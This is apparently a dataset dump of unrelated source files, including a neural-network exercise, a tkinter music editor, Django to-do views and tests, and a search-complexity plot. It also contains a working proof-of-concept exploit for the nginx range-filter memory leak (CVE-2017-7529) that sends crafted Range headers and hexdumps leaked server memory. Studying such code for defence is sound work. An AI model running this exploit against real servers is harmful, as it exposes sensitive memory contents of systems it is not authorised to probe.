noisy_circles, noisy_moons, blobs, gaussian_quantiles, no_structure = load_extra_datasets()
datasets = {"noisy_circles": noisy_circles,
"noisy_moons": noisy_moons,
"blobs": blobs,
"gaussian_quantiles": gaussian_quantiles}
dataset = "gaussian_quantiles"
X, Y = datasets[dataset]
X, Y = X.T, Y.reshape(1, Y.shape[0])
# make blobs binary
if dataset == "blobs":
Y = Y%2
# Visualize the data
plt.scatter(X[0, :], X[1, :], c = Y.reshape(X.shape[1]), s = 40, cmap = plt.cm.Spectral)
# 3-Simple logistic regression
"""
# Train the logistic regression classifier
clf = sklearn.linear_model.LogisticRegressionCV()
clf.fit(X.T, Y.T)
# Plot the decision boundary for logistic regression
plot_decision_boundary(lambda x: clf.predict(x), X, Y)
plt.title("Logistic Regression")
# Print accuracy
LR_predictions = clf.predict(X.T)
print('Accuracy of logistic regression: %d ' % float((np.dot(Y, LR_predictions) + np.dot(1-Y, 1-LR_predictions))/float(Y.size)*100) + '%' + " (percentage of correctly labelled datapoints)")
"""
# 4-Neural network model
# 4.1-Defining the neural network structure
# function: layer_sizes
def layer_sizes(X, Y):
"""
Arguments:
X -- input dataset of shape (input size, number of examples)
Y -- labels of shape (output size, number of examples)
Returns:
n_x -- the size of the input layer
    n_h -- the size of the hidden layer
n_y -- the size of the output layer
"""
n_x = X.shape[0] # size of input layer
n_h = 4
n_y = Y.shape[0] # size of output layer
return (n_x, n_h, n_y)
"""
X_assess, Y_assess = layer_sizes_test_case()
(n_x, n_h, n_y) = layer_sizes(X_assess, Y_assess)
print("The size of the input layer is: n_x = " + str(n_x))
print("The size of the hidden layer is: n_h = " + str(n_h))
print("The size of the output layer is: n_y = " + str(n_y))
"""
# 4.2-Initialize the model's parameters
# function: initialize_parameters
def initialize_parameters(n_x, n_h, n_y):
"""
Arguments:
n_x -- size of the input vector
n_h -- size of the hidden layer
n_y -- size of the output layer
Returns:
params -- python dictionary containing your parameters:
W1 -- weight matrix of shape (n_h, n_x)
b1 -- bias vector of shape (n_h, 1)
W2 -- weight matrix of shape (n_y, n_h)
b2 -- bias vector of shape (n_y, 1)
"""
np.random.seed(2) # we set up a seed so that your output matches ours although the initialization is random
W1 = np.random.randn(n_h, n_x)*0.01
b1 = np.zeros((n_h, 1))
W2 = np.random.randn(n_y, n_h)*0.01
b2 = np.zeros((n_y, 1))
assert (W1.shape == (n_h, n_x))
assert (b1.shape == (n_h, 1))
assert (W2.shape == (n_y, n_h))
assert (b2.shape == (n_y, 1))
parameters = {"W1": W1,
"b1": b1,
"W2": W2,
"b2": b2}
return parameters
"""
n_x, n_h, n_y = initialize_parameters_test_case()
parameters = initialize_parameters(n_x, n_h, n_y)
print("W1 = " + str(parameters["W1"]))
print("b1 = " + str(parameters["b1"]))
print("W2 = " + str(parameters["W2"]))
print("b2 = " + str(parameters["b2"]))
"""
# 4.3-The loop
# function: forward_propagation
def forward_propagation(X, parameters):
"""
Argument:
X -- input data of size (n_x, m)
parameters -- python dictionary containing your parameters (output of initialization function)
Returns:
A2 -- the sigmoid output of the second activation
cache -- a dictionary containing "Z1", "A1", "Z2" and "A2"
"""
# Retrieve each parameter from the dictionary "parameters"
W1 = parameters["W1"]
b1 = parameters["b1"]
W2 = parameters["W2"]
b2 = parameters["b2"]
# Implement forward propagation to calculate A2 (probabilities)
Z1 = np.dot(W1, X) + b1
A1 = np.tanh(Z1)
Z2 = np.dot(W2, A1) + b2
A2 = sigmoid(Z2)
assert(A2.shape == (1, X.shape[1]))
cache = {"Z1": Z1,
"A1": A1,
"Z2": Z2,
"A2": A2}
return A2, cache
"""
X_assess, parameters = forward_propagation_test_case()
A2, cache = forward_propagation(X_assess, parameters)
print(np.mean(cache["Z1"]), np.mean(cache["A1"]), np.mean(cache["Z2"]), np.mean(cache["A2"]))
"""
# function: compute_cost
def compute_cost(A2, Y, parameters):
"""
Computes the cross-entropy cost
Arguments:
A2 -- the sigmoid output of the second activation, of shape (1, number of examples)
Y -- "true" labels vector of shape (1, number of examples)
parameters -- python dictionary containing your parameters W1, b1, W2 and b2
Returns:
cost -- cross-entropy cost
"""
    m = Y.shape[1] # number of examples
# Compute the cross-entropy cost
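    # J = -(1/m) * sum(y*log(a2) + (1-y)*log(1-a2)); reshape(m) flattens the (1, m)
    # row vectors so each np.dot returns the scalar sum over all m examples.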
cost = -(np.dot(Y.reshape(m), np.log(A2).reshape(m)) + np.dot(1-Y.reshape(m), np.log(1-A2).reshape(m)))/m
cost = np.squeeze(cost)
assert(isinstance(cost, float))
return cost
"""
A2, Y_assess, parameters = compute_cost_test_case()
print("cost = " + str(compute_cost(A2, Y_assess, parameters)))
"""
# function: backward_propagation
def backward_propagation(parameters, cache, X, Y):
"""
Implement the backward propagation using the instructions above.
Arguments:
parameters -- python dictionary containing our parameters
cache -- a dictionary containing "Z1", "A1", "Z2" and "A2"
X -- input data of shape (2, number of examples)
Y -- "true" labels vector of shape (1, number of examples)
Returns:
grads -- python dictionary containing your gradients with respect to different parameters
"""
m = X.shape[1]
# First, retrieve W1 and W2 from the dictionary "parameters"
W1 = parameters["W1"]
W2 = parameters["W2"]
# Retrieve also A1 and A2 from dictionary "cache"
A1 = cache["A1"]
A2 = cache["A2"]
# Backward propagation: calculate dW1, db1, dW2, db2
dZ2 = A2 - Y
dW2 = np.dot(dZ2, A1.T) / m
db2 = np.sum(dZ2, axis = 1, keepdims = True) / m
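    # Hidden layer: since A1 = tanh(Z1), g'(Z1) = 1 - A1**2, which gives dZ1 below.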
dZ1 = np.dot(W2.T, dZ2) * (1-A1*A1)
dW1 = np.dot(dZ1, X.T) / m
db1 = np.sum(dZ1, axis = 1, keepdims = True) / m
grads = {"dW1": dW1,
"db1": db1,
"dW2": dW2,
"db2": db2}
return grads
"""
parameters, cache, X_assess, Y_assess = backward_propagation_test_case()
grads = backward_propagation(parameters, cache, X_assess, Y_assess)
print("dW1 = " + str(grads["dW1"]))
print("db1 = " + str(grads["db1"]))
print("dW2 = " + str(grads["dW2"]))
print("db2 = " + str(grads["db2"]))
"""
# function: update_parameters
def update_parameters(parameters, grads, learning_rate = 1.2):
"""
Updates parameters using the gradient descent update rule given above
Arguments:
parameters -- python dictionary containing your parameters
grads -- python dictionary containing your gradients
Returns:
    parameters -- python dictionary containing your updated parameters
"""
# Retrieve each parameter from the dictionary "parameters"
W1 = parameters["W1"]
b1 = parameters["b1"]
W2 = parameters["W2"]
b2 = parameters["b2"]
# Retrieve each gradient from the dictionary "grads"
dW1 = grads["dW1"]
db1 = grads["db1"]
dW2 = grads["dW2"]
db2 = grads["db2"]
# Update rule for each parameter
W1 = W1 - learning_rate * dW1
b1 = b1 - learning_rate * db1
W2 = W2 - learning_rate * dW2
b2 = b2 - learning_rate * db2
parameters = {"W1": W1,
"b1": b1,
"W2": W2,
"b2": b2}
return parameters
"""
parameters, grads = update_parameters_test_case()
parameters = update_parameters(parameters, grads)
print("W1 = " + str(parameters["W1"]))
print("b1 = " + str(parameters["b1"]))
print("W2 = " + str(parameters["W2"]))
print("b2 = " + str(parameters["b2"]))
"""
# Integrate parts 4.1, 4.2 and 4.3 in nn_model()
# function: nn_model
def nn_model(X, Y, n_h, num_iterations = 1000, print_cost = False):
"""
Arguments:
X -- dataset of shape (2, number of examples)
Y -- labels of shape (1, number of examples)
n_h -- size of the hidden layer
num_iterations -- Number of iterations in gradient descent loop
print_cost -- if True, print the cost every 1000 iterations
Returns:
parameters -- parameters learnt by the model. They can then be used to predict.
"""
np.random.seed(3)
n_x = layer_sizes(X, Y)[0]
n_y = layer_sizes(X, Y)[2]
# Initialize parameters, then retrieve W1, b1, W2, b2. Inputs: "n_x, n_h, n_y". Outputs = "W1, b1, W2, b2, parameters".
parameters = initialize_parameters(n_x, n_h, n_y)
W1 = parameters["W1"]
b1 = parameters["b1"]
W2 = parameters["W2"]
b2 = parameters["b2"]
# Loop (gradient descent)
for i in range(0, num_iterations):
# Forward propagation. Inputs: "X, parameters". Outputs: "A2, cache".
A2, cache = forward_propagation(X, parameters)
# Cost function. Inputs: "A2, Y, parameters". Outputs: "cost".
cost = compute_cost(A2, Y, parameters)
# Backpropagation. Inputs: "parameters, cache, X, Y". Output: "grads".
grads = backward_propagation(parameters, cache, X, Y)
# Gradient descent parameter update. Inputs: "parameters, grads". Outputs: "parameters".
parameters = update_parameters(parameters, grads)
# Print the cost every 1000 iterations
if print_cost and i % 1000 == 0:
print("Cost after iteration %i: %f" %(i, cost))
return parameters
"""
X_assess, Y_assess = nn_model_test_case()
parameters = nn_model(X_assess, Y_assess, 4, num_iterations = 10000, print_cost = True)
print("W1 = " + str(parameters["W1"]))
print("b1 = " + str(parameters["b1"]))
print("W2 = " + str(parameters["W2"]))
print("b2 = " + str(parameters["b2"]))
"""
# function: predict
def predict(parameters, X):
"""
Using the learned parameters, predict a class for each example in X
Arguments:
parameters -- python dictionary containing your parameters
X -- input data of size (n_x, m)
Returns:
predictions -- vector of predictions of our model (red: 0 / blue: 1)
"""
# Compute probabilities using forward propagation, and classifies to 0/1 using 0.5 as the threshold.
A2, cache = forward_propagation(X, parameters)
predictions = (A2 > 0.5)
return predictions
"""
parameters, X_assess = predict_test_case()
predictions = predict(parameters, X_assess)
print("predictions mean = " + str(np.mean(predictions)))
"""
"""
# Build a mdoel with a n_h-dimensional hidden layer
parameters = nn_model(X, Y, n_h = 4, num_iterations = 10000, print_cost = True)
# Plot the decision boundary
plot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)
plt.title("Decision Boundary for hidden layer size " + str(4))
# Print accuracy
predictions = predict(parameters, X)
print("Accuracy: %d" % float ((np.dot(Y, predictions.T) + np.dot(1-Y, 1-predictions.T))/float(Y.size)*100) + "%")
"""
# 4.6-Tuning hidden layer size
plt.figure(figsize=(16, 32))
hidden_layer_sizes = [1, 2, 3, 4, 5, 20, 50]
for i, n_h in enumerate(hidden_layer_sizes):
plt.subplot(5, 2, i+1)
plt.title('Hidden Layer of size %d' % n_h)
parameters = nn_model(X, Y, n_h, num_iterations = 5000)
plot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)
predictions = predict(parameters, X)
accuracy = float((np.dot(Y, predictions.T) + np.dot(1-Y, 1-predictions.T))/float(Y.size)*100)
print("Accuracy for {} hidden units: {} %".format(n_h, accuracy))
| [
"[email protected]"
] | |
865d163a7d8a6da2990f17d0e77042066fd1c459 | 519e3049819a86ea45dcfdd92d460844de411305 | /src/gui.py | 611b0cb0fadcf224d7402792bd0597afffc6c87b | [] | no_license | ArthurCamargo/ShowMusic | 4777dde5f05e26a27735f691566bcd80f014e1ef | c5d3b6ddd93c45b286638ecf6668e2181e0aec3f | refs/heads/master | 2023-01-12T07:45:57.987164 | 2020-11-23T02:25:24 | 2020-11-23T02:25:24 | 296,718,513 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,026 | py | """
File: gui.py
Author: Joao Martins
Email: [email protected]
Description:
Main module of the application, handles the graphical user interface
"""
import tkinter as tk
from tkinter.filedialog import askopenfilename, asksaveasfilename
from editor import Editor
from player import Player
from parser import Parser
from music import Music
class Gui(tk.Frame):
"""
Class that manages the GUI, windows, buttons
and visual elements in general
"""
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.grid()
self.editor = Editor(master)
self.music = Music()
self.player = Player()
self.parser = Parser(self.music)
self.create_widgets()
def operational_widgets(self):
""" Operational Widgets
Buttons:
Save: Saves the file
Open: Open the file
Quit: Quit the app"""
frame_op= tk.Frame(self, relief=tk.RAISED)
frame_op.grid(row = 9, column = 1)
save_button = tk.Button(self, text="Save", command=self.save_file)
open_button = tk.Button(self, text="Load", command=self.open_file)
quit_button = tk.Button(self, text="Quit", command=self.master.destroy)
quit_button.grid(row = 9, column = 2)
save_button.grid(row = 9, column = 3)
open_button.grid(row = 9, column = 4)
def save_file(self):
"""Save the current file as a new file."""
filepath = asksaveasfilename(
defaultextension="txt",
filetypes=[("Text Files", "*.txt"), ("All Files", "*.*")],
)
if not filepath:
return
with open(filepath, "w") as output_file:
text = self.editor.txt_area.get(1.0, tk.END)
output_file.write(text)
def compile(self):
""" Compile the current file to generate music. """
text = self.editor.txt_area.get(1.0, tk.END)
self.parser.text_area = text[:-1] #remove the last \n to avoid bugs
self.parser.parse()
self.music.generate()
self.player.load_music('../temp/sample.mid')
def open_file(self):
"""Open a file for editing."""
filepath = askopenfilename(
filetypes=[("Text Files", "*.txt"), ("All Files", "*.*")]
)
if not filepath:
return
self.editor.txt_area.delete(1.0, tk.END)
with open(filepath, "r") as input_file:
text = input_file.read()
self.editor.txt_area.insert(tk.END, text)
def load_config_file(self):
""" Load a configuration file into the application"""
filepath = askopenfilename(
filetypes=[("Text Files", "*.sm"), ("All Files", "*.*")]
)
if not filepath:
return
self.parser.load_configuration(filepath)
def music_widgets(self):
""" Music related Widgets
Buttons:
Play/Pause: Plays and pauses the music
Stop: Stop the music
Compile: Compile the song into the music"""
frame_music = tk.Frame(self, relief=tk.RAISED)
frame_music.grid(row = 10, column = 3)
play_pause_button = tk.Button(frame_music, text='Play',
command=self.player.play)
stop_button = tk.Button(frame_music, text='Stop',
command=self.player.stop)
compile_button = tk.Button(frame_music, text='Compile',
command=self.compile)
load_config_button = tk.Button(frame_music, text='Load Configuration',
command=self.load_config_file)
play_pause_button.grid(row = 0, column = 0)
stop_button.grid(row = 0, column = 1)
compile_button.grid(row = 0, column = 2)
load_config_button.grid(row = 0, column = 3)
def instruments_widgets(self):
""" Instrument related Widgets """
frame_instruments = tk.Frame(self, relief=tk.RAISED)
frame_instruments.grid(row = 0, column = 0)
#Images of the instruments
photo_harp = tk.PhotoImage(file = '../icons/grand-piano.png')
photo_tubular= tk.PhotoImage(file = '../icons/tubular.png')
photo_agogo= tk.PhotoImage(file = '../icons/agogo.png')
photo_flute= tk.PhotoImage(file = '../icons/pan-flute.png')
photo_organ= tk.PhotoImage(file = '../icons/organ.png')
harpsichord = tk.Label(frame_instruments, image=photo_harp,
compound = tk.CENTER, borderwidth=0)
tubular_bells = tk.Label(frame_instruments, image=photo_tubular,
compound = tk.CENTER, borderwidth=0)
agogo = tk.Label(frame_instruments, image=photo_agogo,
compound = tk.CENTER, borderwidth=0)
pan_flute = tk.Label(frame_instruments, image=photo_flute,
compound = tk.CENTER, borderwidth=0)
church_organ = tk.Label(frame_instruments, image=photo_organ,
compound = tk.CENTER, borderwidth=0)
        #Images must be referenced like this because of a known tkinter bug:
        #http://effbot.org/pyfaq/why-do-my-tkinter-images-not-appear.htm
harpsichord.image = photo_harp
tubular_bells.image = photo_tubular
agogo.image = photo_agogo
church_organ.image= photo_organ
pan_flute.image = photo_flute
        #Create the grid of the instruments
harpsichord.grid(row = 1, column = 0)
tubular_bells.grid(row = 2, column = 0)
agogo.grid(row = 3, column = 0)
pan_flute.grid(row = 4, column = 0)
church_organ.grid(row = 5, column = 0)
def create_widgets(self):
""" Create the gui widget of the application """
self.music_widgets()
self.instruments_widgets()
self.operational_widgets()
self.editor.draw_frame()
_app = Gui(tk.Tk())
_app.parser.load_configuration("../config/config.sm")
_app.mainloop()
| [
"[email protected]"
] | |
d48e81a28bb7684f2cc31d963b2adb56ac9aef3d | e8fce1e2e1737ed5e94eb2a47078509d4b733389 | /api/tests.py | 8e804679b264b5877ac973829c5b7fa5e74932b1 | [] | no_license | mohiz/test_djanog_decimal_field | 7d431166c18242d9295baaf7d8710d0feb85cbee | 490f6d40812a40847089eaefe06486e47e5bab02 | refs/heads/master | 2023-05-05T06:50:24.192599 | 2021-05-29T03:56:17 | 2021-05-29T03:56:17 | 371,870,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | from django.test import TestCase
from django.db.models import F
from api.models import Foo
from decimal import Decimal
class TestSimple(TestCase):
def test_simple(self):
f = Foo.objects.create(amount=Decimal('0.5'))
f.amount = F('amount') - Decimal('0.4')
f.save(update_fields=['amount', ])
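        # After saving an F() expression, f.amount holds a CombinedExpression rather
        # than a number; refresh_from_db() fetches the value computed by the database.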
f.refresh_from_db()
self.assertEqual(
f.amount,
Decimal('0.1')
)
| [
"[email protected]"
] | |
c92862abb7710071303f4ecd25dce31b9f526d18 | bad8c0aed84630051d428d78aebb8e5f5cc1a67a | /core/views.py | 66c3fb32b2b44e3d33c517bf2f25098405094e7b | [] | no_license | dj999dash/Django-Auth | a383923d4cdfb9056a78232472b6ba6dd712bf6e | 1f340529670d5a676d435b03980b7b5f5240506a | refs/heads/master | 2022-12-24T18:57:48.334667 | 2020-10-02T13:48:23 | 2020-10-02T13:48:23 | 259,327,203 | 0 | 1 | null | 2020-10-02T13:48:24 | 2020-04-27T13:17:50 | Python | UTF-8 | Python | false | false | 758 | py | from django.shortcuts import render,redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
# Create your views here.
def home(request):
count = User.objects.count()
return render(request, 'home.html',{
'count':count
})
def signup(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
form = UserCreationForm()
return render(request,'registration/signup.html', {
'form': form
})
@login_required
def secret_page(request):
return render(request,'secret_page.html') | [
"[email protected]"
] | |
db18f6260643739f1e162671d92c211770ddcff4 | e069f8d0013ab289048e20dfd5a2bcc8019841c9 | /06-organizacion-y-complejidad/07-graficos/busqueda.py | 1ac0f545e4a8551278ff297853822ea8bd2512e7 | [] | no_license | francosbenitez/unsam | 9981e8196e3a9abb1fb29c170d43c55beec5520a | 1390e3245ee3f9a3f4aa97146a80ed56fa72cd45 | refs/heads/main | 2023-08-14T03:16:15.183354 | 2021-09-21T13:58:21 | 2021-09-21T13:58:21 | 373,769,485 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,371 | py | """
Exercise 6.20: Binary search vs. sequential search
In this exercise we redo the plots from the previous example, first changing the search algorithm and then comparing both algorithms.
Using experimento_secuencial_promedio(lista, m, k) as a starting point, write a function experimento_binario_promedio(lista, m, k) that counts how many comparisons binary search performs on average (over k elementary experiments) on the given list.
Plot the results of these experiments for lists of length 1 through 256.
Plot both curves in a single figure, naming the curves, the axes, and the whole figure appropriately. Play with xlim and ylim to get a good view of both curves, even if you have to restrict the range.
What do you observe in these plots? What can you say about the complexity of each algorithm? Are they similar?
Save the code for this exercise in plot_bbin_vs_bsec.py.
import random
import matplotlib.pyplot as plt
import numpy as np
def generar_lista(n, m):
l = random.sample(range(m), k = n)
l.sort()
return l
def generar_elemento(m):
return random.randint(0, m-1)
def busqueda_secuencial(lista, x):
    '''If x is in the list, return the index of its first occurrence;
    otherwise return -1.
    '''
pos = -1
for i,z in enumerate(lista):
if z == x:
pos = i
break
return pos
def busqueda_secuencial_(lista, x):
    '''If x is in the list, return the index of its first occurrence;
    otherwise return -1. Also return the number of comparisons
    the function performed.
    '''
comps = 0
pos = -1
for i,z in enumerate(lista):
comps += 1
if z == x:
pos = i
break
return pos, comps
def experimento_secuencial_promedio(lista, m, k):
comps_tot = 0
for i in range(k):
x = generar_elemento(m)
comps_tot += busqueda_secuencial_(lista,x)[1]
comps_prom = comps_tot / k
return comps_prom
def busqueda_binaria(lista, x, verbose = False):
    '''Binary search
    Precondition: the list is sorted
    Returns -1 if x is not in the list;
    returns p such that lista[p] == x if x is in the list
    '''
if verbose:
print(f'[DEBUG] izq |der |medio')
pos = -1
izq = 0
der = len(lista) - 1
while izq <= der:
medio = (izq + der) // 2
if verbose:
print(f'[DEBUG] {izq:3d} |{der:>3d} |{medio:3d}')
if lista[medio] == x:
pos = medio
if lista[medio] > x:
der = medio - 1
else:
izq = medio + 1
return pos
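
# Illustrative check: busqueda_binaria([1, 3, 5, 7], 5) returns 2.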
def busqueda_binaria_(lista, x, verbose = False):
    '''Binary search
    Precondition: the list is sorted
    Returns -1 if x is not in the list;
    returns p such that lista[p] == x if x is in the list
    '''
if verbose:
print(f'[DEBUG] izq |der |medio')
pos = -1
izq = 0
der = len(lista) - 1
comps_tot = 0
while izq <= der:
comps_tot += 1
medio = (izq + der) // 2
if verbose:
print(f'[DEBUG] {izq:3d} |{der:>3d} |{medio:3d}')
if lista[medio] == x:
pos = medio
if lista[medio] > x:
der = medio - 1
else:
izq = medio + 1
return pos, comps_tot
def experimento_binario_promedio(lista, m, k):
comps_tot = 0
for i in range(k):
x = generar_elemento(m)
comps_tot += busqueda_binaria_(lista,x)[1]
comps_prom = comps_tot / k
return comps_prom
m = 10000
k = 1000
largos = np.arange(256) + 1
comps_promedio_sec = np.zeros(256)
comps_promedio_bin = np.zeros(256)
for i, n in enumerate(largos):
lista = generar_lista(n, m)
comps_promedio_sec[i] = experimento_secuencial_promedio(lista, m, k)
comps_promedio_bin[i] = experimento_binario_promedio(lista, m, k)
plt.plot(largos,comps_promedio_sec,label = 'Sequential search')
plt.plot(largos,comps_promedio_bin,label = 'Binary search')
plt.xlabel("List length")
plt.ylabel("Number of comparisons")
plt.title("Search complexity")
plt.legend()
plt.xscale("log")
plt.yscale("log")
plt.show()
| [
"[email protected]"
] | |
d2a1afd0b72a8d69f17d62a5263ac72b31a5afa7 | 5e84378aa01c773e9080c3e63a48857887ade95d | /2017/CVE-2017-7529/exp&poc/CVE-2017-7529_PoC/CVE-2017-7529_PoC.py | bb2422b8d0b83d85eeef9c15d0f787f2862303e5 | [] | no_license | tdcoming/Vulnerability-engine | ed9a9634923296ac4b241005c085c0a7e51b36ed | 15f872fab2ede9a7f07edd7a85298444593bd10e | refs/heads/master | 2020-08-02T11:52:09.331001 | 2019-11-20T02:08:12 | 2019-11-20T02:08:12 | 211,341,603 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,758 | py |
import urllib.parse, requests, argparse
global colorama, termcolor
try:
import colorama, termcolor
colorama.init(autoreset=True)
except Exception as e:
termcolor = colorama = None
colored = lambda text, color="", dark=False: termcolor.colored(text, color or "white", attrs=["dark"] if dark else []) if termcolor and colorama else text
class Exploit(requests.Session):
buffer = set()
def __init__(self, url):
length = int(requests.get(url).headers.get("Content-Length", 0)) + 623
super().__init__()
self.headers = {"Range": f"bytes=-{length},-9223372036854{776000 - length}"}
self.target = urllib.parse.urlsplit(url)
def check(self):
try:
response = self.get(self.target.geturl())
return response.status_code == 206 and "Content-Range" in response.text
except Exception as e:
return False
def hexdump(self, data):
for b in range(0, len(data), 16):
line = [char for char in data[b: b + 16]]
print(colored(" - {:04x}: {:48} {}".format(b, " ".join(f"{char:02x}" for char in line), "".join((chr(char) if 32 <= char <= 126 else ".") for char in line)), dark=True))
def execute(self):
vulnerable = self.check()
print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
if vulnerable:
data = b""
while len(self.buffer) < 0x80:
try:
response = self.get(self.target.geturl())
for line in response.content.split(b"\r\n"):
if line not in self.buffer:
data += line
self.buffer.add(line)
except Exception as e:
print()
print(colored(f"[!] {type(e).__name__}:", "red"))
print(colored(f" - {e}", "red", True))
break
except KeyboardInterrupt:
print()
print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
break
print(colored(f"[i] Receiving Data [{len(data)} bytes] ..."), end = "\r")
if data:
print()
self.hexdump(data)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog = "CVE-2017-7529",
description = "Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.",
epilog = "By: en0f")
parser.add_argument("url", type = str, help = "Target URL.")
parser.add_argument("-c", "--check", action = "store_true", help = "Only check if Target is vulnerable.")
args = parser.parse_args()
try:
exploit = Exploit(args.url)
if args.check:
vulnerable = exploit.check()
print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
else:
try:
exploit.execute()
except Exception as e:
print(colored(f"[!] {type(e).__name__}:", "red"))
print(colored(f" - {e}", "red", True))
except KeyboardInterrupt:
print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
except Exception as e:
print(colored(f"[!] {urllib.parse.urlsplit(args.url).netloc}: {type(e).__name__}", "red")) | [
"[email protected]"
] | |
2d984a6ee6334fda894e19382b98c8e37fc75eca | 850df0e1666ec735939d20e1baf234760513bc7d | /account/migrations/0005_auto_20201128_1523.py | 0133dfbda1e3290a939df5b464038cb91f920378 | [] | no_license | aoi797airplane/platform | 3f6f8a1107786d9751b3b263eb699a2680b6bc52 | a3580546d313689b8e4b7e5971337e5c617845f5 | refs/heads/master | 2023-01-27T12:57:40.301335 | 2020-12-04T05:45:24 | 2020-12-04T05:45:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 450 | py | # Generated by Django 3.1.3 on 2020-11-28 06:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0003_remove_ea_ea'),
('account', '0004_profile_ea'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='ea',
field=models.ManyToManyField(blank=True, to='main.Ea', verbose_name='EA'),
),
]
| [
"[email protected]"
] | |
954e3ab168d4fbcd0be402006fa505131279c73f | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_199/545.py | 17c70db8eec59ac875b8c95e77f7983acaabe002 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,267 | py | import sys
numTests = int(sys.stdin.readline())
tests = []
def isAllFlipped(pancakes, i, j):
for k in range(i, j):
if(pancakes[k]=='-'):
return False
return True
# Read all tests
for i in range(numTests):
t = sys.stdin.readline()
s = t.split(' ')
tests.append(s)
# Solve them
for i in range(numTests):
s = tests[i]
pancakes = list(s[0])
pancakesLen = len(pancakes)
fliperSize = int(s[1])
# base case
if fliperSize > pancakesLen:
if isAllFlipped(pancakes, 0, pancakesLen):
print 'Case #' + str(i+1) + ': 0'
else:
print 'Case #' + str(i+1) + ': IMPOSSIBLE'
continue
# tries to solve flipping from left to right
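    # Greedy is optimal here: the leftmost '-' can only be fixed by a flip that
    # starts exactly at it, so that flip is forced; scan left to right and repeat.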
totalFlips = 0
for j in range(0, (pancakesLen-fliperSize+1)):
if pancakes[j] == '-':
totalFlips += 1
for k in range(j, (j+fliperSize)):
if pancakes[k] == '-':
pancakes[k] = '+'
else:
pancakes[k] = '-'
# check and print result
if isAllFlipped(pancakes, (pancakesLen-fliperSize+1), pancakesLen):
print 'Case #' + str(i+1) + ': ' + str(totalFlips)
else:
print 'Case #' + str(i+1) + ': IMPOSSIBLE'
| [
"[email protected]"
] | |
da64e9293511b13a8336e14e96b3c5358d59ea74 | a7252408048aaca7a30376d70ef7d02021aa7ec4 | /todolist/views.py | 9a008f813b0286d1311fe981e03874aed28fc4e0 | [] | no_license | wanZzz6/to_do_list | 2333f4fee8762d4c41c71d471a47cca6b2e6c8b4 | 2580f37fc9b8aa3c8aea3ac7843615eda1ce703f | refs/heads/master | 2020-04-23T15:55:38.859389 | 2019-02-18T12:48:36 | 2019-02-18T12:48:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,819 | py | from django.shortcuts import render, redirect
# Create your views here.
lst = [{'待办事项': '遛狗', '已完成': False},
{'待办事项': '遛狗啊', '已完成': True}, ]
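# The dict keys and template context keys are Chinese and shared with the templates:
# '待办事项' = "to-do item", '已完成' = "done", '清单' = "list",
# '信息' = "message", '警告' = "warning", '遛狗' = "walk the dog".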
def home(request):
global lst
if request.method == 'POST':
content = request.POST.get('待办事项')
if content:
lst.append({'待办事项': content, '已完成': False})
content = {'清单': lst, '信息':'添加成功!'}
return render(request, 'todolist/home.html', content)
else:
return render(request, 'todolist/home.html', {'警告': '请输入内容', '清单':lst})
else:
content = {'清单': lst}
return render(request, 'todolist/home.html', content)
def edit(request, forloop_counter):
global lst
if request.method == 'POST':
if request.POST.get('已修改事项') == '':
return render(request, 'todolist/edit.html', {'警告':'请输入内容'})
else:
lst[int(forloop_counter) - 1]['待办事项'] = request.POST['已修改事项']
return redirect('todolist:主页')
else:
content = lst[int(forloop_counter) - 1]['待办事项']
return render(request, 'todolist/edit.html',{'待修改事项':content, 'num':forloop_counter})
def about(request):
return render(request, 'todolist/about.html')
def delate(request, forloop_counter):
lst.pop(int(forloop_counter) - 1)
return redirect('todolist:主页')
def cross(request, forloop_counter):
global lst
if request.POST['完成状态'] == '已完成':
lst[(int(forloop_counter) - 1)]['已完成'] = True
return redirect('todolist:主页')
else:
lst[(int(forloop_counter) - 1)]['已完成'] = False
return redirect('todolist:主页')
| [
"[email protected]"
] | |
5dd940e274d09977d0920ec34c29c7b99498bef7 | ee974d693ca4c4156121f8cb385328b52eaac07c | /env/lib/python3.6/site-packages/dmlc_tracker/ssh.py | 131a020cf5e48c39da5177ddf3388d3dae91a560 | [] | no_license | ngonhi/Attendance_Check_System_with_Face_Recognition | f4531cc4dee565d0e45c02217f73f3eda412b414 | 92ff88cbc0c740ad48e149033efd38137c9be88d | refs/heads/main | 2023-03-12T07:03:25.302649 | 2021-02-26T15:37:33 | 2021-02-26T15:37:33 | 341,493,686 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:a98dbbfdf7c695ce9963e992b64966e8030206b0403401776879363101369004
size 3155
| [
"Nqk180998!"
] | Nqk180998! |
